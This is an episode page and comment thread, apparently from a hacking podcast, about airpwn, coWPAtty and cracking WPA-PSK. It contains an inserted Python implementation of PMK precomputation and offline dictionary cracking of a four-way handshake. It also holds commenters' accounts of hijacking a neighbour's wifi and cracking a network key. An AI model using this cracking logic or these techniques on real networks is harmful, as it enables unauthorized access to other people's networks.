The gang gathers at a dive in Hoboken, NJ during their trip to NYC for the live Diggnation and discusses wireless packet injection with airpwn, advancements in WPA-PSK attacks and, of course, virtualization.


In an effort to thwart hangovers, the gang drops by DC's Tavern in Hoboken to geek out about WiFi and virtualization over shots and cold ones.

Darren is excited about the recent improvements to both Airpwn and Cowpatty.

Edit: Mubix points out these awesome WPA Tables from Offensive-Security (You know ‘em as the BackTrack guys).

Best WPA tables out there for use with CoWPAtty. (And another little plus: they posted the password list they used to generate the tables, which is also an AWESOME password list for cracking all kinds of passwords. ;-)

Matt answers some viewers questions and encourages more for an upcoming special.

Shannon has all the deets on this week’s contest and LAN party.


17 Comments

  • ioyou 4 years ago

    Man, I love airpwn.
    I just compiled the new version on my BackTrack box and I have it running on my neighbor's wifi lol.

    He gets pissed every time lol. It redirects him to my BackTrack php-cgi Apache server, which redirects him to a rickroll lol

  • mistertylersmith 4 years ago

    Is that Blue Moon? If so, good choice.

  • Sc00bz 4 years ago

    Just letting you know it is impossible to make rainbow tables for WPA-PSK and have them be of any use. The four-way handshake has two nonces (256 bits each) and two mac addresses for salt. Which means you can’t make a rainbow table for that. Now Winrtgen does have an option to make WPA-PSK tables. This requires you to have the WPA-PSK hash, but if you have the WPA-PSK hash you can already get onto the network so knowing the password is really pointless. Unless the password is changed frequently and you find the pattern, but this will never happen in the real world because you would need to break in multiple times and crack multiple hashes. Also no one changes their wireless key frequently and keeps some pattern to it.

    ** Funny story about passwords **
    At NIU you are required to change your password once a semester. "Your password must be 8 characters long. It must be a mix of numbers and lowercase letters." (Yes, I know they are dumb; the key space is only 2^41.25, "2.61 trillion", hopefully that's right.) And my English teacher told everyone to do something like fall2009 and then change it to spring09 (yes, I know he's retarded). I'm embarrassed to have graduated from there. Hmm, this is a perfect example of why you never have passwords that expire: people will just put the current year at the end, increment a number, or, if it's too frequent like at NIU for my English teacher, the whole password will be when the password is valid.

    Now what you can do for WPA-PSK is take a list of passwords, pre-calculate the hashes of them and store that. Then when you capture the handshake all you need to do is take a hash, do a few HMACs and check the answer. This is exactly how coWPAtty works.

    If you don’t believe me here’s a nice little quote:
    "This page is to give a little more insight into the methodology and logic behind conceiving and building the CoWF WPA-PSK Rainbow Tables (actually they are lookup tables but I just like the term 'rainbow tables' a lot.)" -renderlab.net

  • Haha, cool episode and cool variation to regular episodes!

  • Please don’t do this kind of episodes anymore. It’s annoying to listen when there is so much background noise.

  • Investe 4 years ago

    Well, I liked it! It's something different and sometimes I couldn't understand very well (probably because my English sucks) but I think it's a good break. It shows you are active, creative and never boring! And I like the fact that you all were kinda drunk at the end... Well done.

  • Cowpatty is out.

    Have you heard of pyrit at http://code.google.com/p/pyrit/ for generating WPA hashes? The power of Stream/CUDA has made much bigger tables possible. :)

  • David 4 years ago

    Sc00bz: There’s no reason why it’s “impossible” to make PMK rainbow tables. A rainbow table is just a more advanced form of lookup table, where instead of mapping each plaintext directly to its hash (as is done in a lookup table), the start of a chain of hashes and reductions is mapped to the end of the chain. Looking up a reduced hash in the rainbow table involves hashing and reducing it incrementally until it matches the endpoint of some chain. This means that the size of the table can be greatly reduced, at the expense of extra computation to look up hashes. Furthermore, the amount of computation tradeoff can be adjusted just by adjusting the chain length.

    Designing PMK rainbow tables would only require someone to define a class of reduction functions that can transform a PMK to a PSK, and of course develop a tool that can generate and interpret these tables. As you say, cowpatty/genpmk only works with lookup tables.

    As for your saying that you cannot make rainbow tables "for" the four-way handshake, that doesn't make sense anyway. The four-way handshake is just used to generate a client's PTK(s) for the session, and requires both the client station and the access point to already know the PMK beforehand. We're not concerned about this process or the salts used in this process. We're only concerned about the PSK-to-PMK hashing process (that is, converting a cleartext passphrase to the big 32-byte hash). The only unpredictable salt used in this hashing process is the SSID (and SSID length, but that is easily derived from the SSID), which is why there are separate tables for different SSIDs.

    • Hi David,
      I had the same idea, but it has a drawback we can't overcome. We don't have any initial PMK to apply the reduction function to and to compare later with the values stored in the table.

      In an ordinary TMTO attack, the initial attacked value would be a block ciphered with an unknown key (which maps to a known cleartext block) or a hash value which maps to an unknown password. But we don't have such a value in this case.

      Also, the passphrase is "salted" with the ESSID of the network, so we would have to build a separate table for each different ESSID, which renders the attack impracticable most of the time.

      Best regards,
      Fernando.

  • Anyone know which antenna Darren is using with the ALFA receiver? I have the same receiver.
    Thanks

  • @JT, it’s just a 9dBi antenna I had floating around. Not sure what it came off. You can pick ‘em up pretty cheap off ebay and the like. http://www.google.com/products?q=9db+antenna&scoring=p

  • Just an FYI, you don't want to consider the bare metal hypervisor in ESXi (or ESX) for ANYTHING that you would like audio for. It's not supported. Also, there's a limitation of 6 pseudo PCI devices, and the display always takes up one, so you are really limited to 5. For a little more flexibility in those situations, use Microsoft Virtual PC or VMware Workstation. I hadn't actually played with VMware Workstation until I got the license for passing the VCP exam, but I actually like it!

  • Sc00bz 4 years ago

    David, you missed the most important part of that “just letting you know it is impossible to make rainbow tables for WPA-PSK and have them be of any use.” Let’s say you have a PMK rainbow table for the correct SSID. Now all you need is the PMK to use the rainbow table, but if you have the PMK you can already get onto the network. So knowing the PSK is not useful.

    P.S. I lied on the not being able to make a rainbow table for the four-way handshake. By “you can’t make a rainbow table for that” I mean you need to do 2^304 times more work (because of the nonce and mac) if you “are the access point” or 2^608 times more work if you aren’t. Which is infeasible for the next 450 years.

  • David said “Sc00bz: There’s no reason why it’s “impossible” to make PMK rainbow tables.”

    For practical purposes, this is incorrect, or at least, impractical.

    You could write a rainbow table to compute a PMK with the associated PSK, which would not be useful against recovering the WPA2 4-way handshake. It would only be useful if you got the PMK through some other means (like dumping it from the registry). Even then, it's not useful, because you don't actually need the PSK to connect to the network. You can actually paste the PMK right into the Windows network setup, which is why the PSK is limited to 63 characters (the PMK is 64 characters, allowing the developer to figure out what you mean – PSK or PMK – just by looking at the length of the input string).

    It's not possible to write a rainbow table to attack the 4-way handshake exchange since the nonces represent uniqueness in the conversation that can't be precomputed. You could not ascertain, for example, a partial match from a precomputed PMK without the entire PMK itself, making the time/memory trade-off ineffective here. I think the way coWPAtty does PMK precomputation is the best that can be accomplished given the design of WPA (and kudos to the IEEE for providing a reasonable protocol for *consumer* network authentication and key derivation).

    -Josh

    p.s. For the record, coWPAtty was intended to make fun of WPA, not my code. :)
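The PMK precomputation Sc00bz and David describe above, followed by the "few HMACs and a compare" coWPAtty does per candidate once a handshake is captured, written out as an added Python example. This is not code from the page, from coWPAtty or from genpmk. The passphrase/SSID pair "password"/"IEEE" is the published 802.11i Annex H test vector; the MAC addresses, nonces and the EAPOL-Key frame body are constructed stand-ins, not a real capture, and the simplified frame puts the zeroed MIC field at the end rather than where a real EAPOL-Key frame carries it.

```python
import hashlib
import hmac

# PRF label fixed by 802.11i for pairwise key derivation.
PRF_LABEL = b"Pairwise key expansion"


def passphrase_to_pmk(passphrase: str, ssid: str) -> bytes:
    """PSK -> PMK as 802.11i specifies: PBKDF2-HMAC-SHA1, 4096 rounds, 256-bit output.
    The SSID is the salt, which is why a precomputed table is bound to one SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, label, min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)).
    Each 20-byte chunk is HMAC-SHA1(PMK, label || 0x00 || data || counter)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):  # 4 * 20 = 80 bytes covers the 64 bytes needed
        out += hmac.new(pmk, PRF_LABEL + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA2 (CCMP) EAPOL-Key MIC: HMAC-SHA1 over the frame with its MIC field zeroed,
    truncated to 16 bytes. (WPA/TKIP uses HMAC-MD5 instead; not shown here.)"""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def build_pmk_table(wordlist, ssid: str) -> dict:
    """What genpmk does: the expensive PBKDF2 step, done once per (passphrase, SSID)
    and stored, so it never has to be repeated against later captures for this SSID."""
    return {w: passphrase_to_pmk(w, ssid) for w in wordlist}


def crack_handshake(pmk_table, aa, spa, anonce, snonce, eapol_zeroed, captured_mic):
    """What coWPAtty does with a table: per candidate PMK, one PRF and one HMAC,
    then compare against the MIC sniffed from the handshake. The nonces and MACs
    only enter here, after the PMK, so they cost nothing to the precomputation."""
    for passphrase, pmk in pmk_table.items():
        kck = prf_512(pmk, aa, spa, anonce, snonce)[:16]  # KCK is the first 128 bits of the PTK
        if hmac.compare_digest(eapol_mic(kck, eapol_zeroed), captured_mic):
            return passphrase
    return None


def simulate_capture(passphrase, ssid, aa, spa, anonce, snonce):
    """Stand-in for sniffing message 2 of the 4-way handshake: the client derives the
    PTK from the real PMK and MICs its EAPOL-Key frame with the KCK."""
    pmk = passphrase_to_pmk(passphrase, ssid)
    kck = prf_512(pmk, aa, spa, anonce, snonce)[:16]
    # Constructed, simplified EAPOL-Key body: a header, the SNonce, then the 16-byte
    # MIC field zeroed out, as a cracker sees it before recomputing the MIC.
    eapol_zeroed = b"\x01\x03\x00\x75" + snonce + bytes(16)
    return eapol_zeroed, eapol_mic(kck, eapol_zeroed)


def demo():
    """Build a table for the right SSID and for a wrong one, crack the same capture with both."""
    ssid, true_passphrase = "IEEE", "password"  # 802.11i Annex H test vector pair
    aa = bytes.fromhex("001122334455")           # constructed AP address
    spa = bytes.fromhex("66778899aabb")          # constructed station address
    anonce = bytes(range(32))                    # constructed nonces, fixed for reproducibility
    snonce = bytes(range(32, 64))
    eapol_zeroed, mic = simulate_capture(true_passphrase, ssid, aa, spa, anonce, snonce)

    wordlist = ["letmein", "fall2009", "password", "spring09"]
    hit = crack_handshake(build_pmk_table(wordlist, ssid), aa, spa, anonce, snonce, eapol_zeroed, mic)
    # Same words, table generated for another SSID: every PMK differs, nothing matches.
    miss = crack_handshake(build_pmk_table(wordlist, "linksys"), aa, spa, anonce, snonce, eapol_zeroed, mic)
    return hit, miss


if __name__ == "__main__":
    print(passphrase_to_pmk("password", "IEEE").hex())
    print(demo())
```

The split between build_pmk_table and crack_handshake is the whole point of the tables the post links to: the 4096-round PBKDF2 is paid once per passphrase per SSID and can be shipped on disk, while the per-capture work is a PRF and one HMAC per candidate. The second crack in demo shows Fernando's caveat from the thread: a table built for "linksys" is useless against an "IEEE" network even though the passphrase is in the wordlist.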

  • PRIMEVAL 4 years ago

    THIS episode I have downloaded twice (xvid & avi); both downloads have the megabytes there but don't play, other episodes do, also the embedded video doesn't play..... is it just me or is there a wee glitch in the system....?

  • Shinji 4 years ago

    I don't know about WPA (haven't tried personally) but I don't even need BackTrack for wireless hacking. Here is what I used...

    Ubuntu
    aircrack-ng (package)
    macchanger (package)
    Intel Wifi Link 5100

    Then I just followed these instructions:

    I used 'macchanger --random' so I would get a new MAC address, and since it was random it can't be blocked easily. I just made note of the new MAC. The adapter was put into monitor mode. I had the key cracked in less than 20 minutes on an empty network (i.e. no one connected at all).

  • You guys need to be drinking faster… you did like a whole show on 1 glass of beer. Blue moon is the heat so drink it. Don’t let it get warm. Shame on you all.